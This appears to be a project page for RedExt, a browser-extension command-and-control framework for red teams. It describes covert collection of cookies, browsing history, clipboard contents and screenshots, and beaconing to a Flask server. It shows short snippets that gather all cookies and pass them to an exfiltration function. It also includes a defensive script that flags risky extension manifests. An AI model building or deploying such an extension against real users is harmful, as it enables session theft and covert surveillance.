RedExt Browser Extension C2 Framework

A powerful browser extension-based Command & Control framework for authorized
red team operations and security assessments.

Core Capabilities

Comprehensive browser-based reconnaissance and data collection capabilities for security assessments.

Browser Data Collection

Secure extraction of cookies, history, bookmarks, and local storage data with advanced filtering capabilities

Stealth Operations

Dynamic command polling with randomized intervals and robust error handling for reliable operations

Advanced C2 Server

Flask-based command & control server with SQLite backend for efficient agent management and data handling

Visual Intelligence

Screenshot capture, DOM snapshots, and clipboard monitoring for comprehensive situational awareness

Technical Architecture

Browser Extension

  • Background service worker for persistent operations
  • Content script injection for DOM interaction
  • Secure communication with C2 server
  • Built with Chrome Extension Manifest V3

C2 Infrastructure

  • Flask-based RESTful API endpoints
  • SQLite database for data persistence
  • Real-time agent management dashboard
  • Flexible command scheduling system
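
From the defender's side, the capabilities and architecture listed above show up as a recognizable permission footprint in an extension's manifest.json. The following is an added example, not RedExt's code: a Node.js check that grades a manifest by that footprint. The permission-to-capability mapping, the severity thresholds and the sample manifests are assumptions constructed for illustration.

```javascript
// Added example (not RedExt code). Permission names are real Chrome extension
// permissions; tying them to this page's capability list is an assumption.
const DATA_PERMS = ['cookies', 'history', 'bookmarks', 'clipboardRead'];
const BROAD_HOSTS = new Set(['<all_urls>', '*://*/*', 'http://*/*', 'https://*/*']);

function auditManifest(manifest) {
  const perms = new Set([
    ...(manifest.permissions || []),
    ...(manifest.optional_permissions || []),
  ]);
  // MV3 declares hosts in host_permissions; MV2 mixed them into permissions.
  const hosts = [
    ...(manifest.host_permissions || []),
    ...(manifest.optional_host_permissions || []),
    ...perms,
  ];
  const dataAccess = DATA_PERMS.filter((p) => perms.has(p));
  const broadHosts = hosts.some((h) => BROAD_HOSTS.has(h));
  // Page-wide injection: static content scripts, or scripting + broad hosts.
  const staticInject = (manifest.content_scripts || []).some((cs) =>
    (cs.matches || []).some((m) => BROAD_HOSTS.has(m)));
  const injectsEverywhere = staticInject || (perms.has('scripting') && broadHosts);
  const hasWorker = Boolean(manifest.background && manifest.background.service_worker);

  let severity = 'low';
  if ((broadHosts && dataAccess.length >= 1) || injectsEverywhere) severity = 'medium';
  if (broadHosts && dataAccess.length >= 2 && injectsEverywhere) severity = 'high';
  return { severity, dataAccess, broadHosts, injectsEverywhere, hasWorker };
}

// Constructed sample manifests for illustration only.
const SAMPLE_BROAD = {
  manifest_version: 3,
  permissions: ['cookies', 'history', 'bookmarks', 'clipboardRead', 'scripting', 'tabs'],
  host_permissions: ['<all_urls>'],
  background: { service_worker: 'background.js' },
  content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
};
const SAMPLE_NARROW = {
  manifest_version: 3,
  permissions: ['storage', 'activeTab'],
  background: { service_worker: 'worker.js' },
};

for (const [name, m] of Object.entries({ SAMPLE_BROAD, SAMPLE_NARROW })) {
  console.log(name, JSON.stringify(auditManifest(m)));
}
```

A 'high' result is a prompt for manual review of the extension's source and network destinations, since legitimate extensions can request the same combination.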

Implementation Examples

Cookie Extraction

const cookies = await chrome.cookies.getAll({});
exfilData('COOKIES', {
  domain: 'all',
  cookies: groupByDomain(cookies)
});

Tags: Data Collection, Browser State Analysis

DOM Snapshot

await captureScreenshot(quality);
broadcastMessage({
  command: 'domSnapshot'
});

Tags: Visual Intelligence, Real-time Monitoring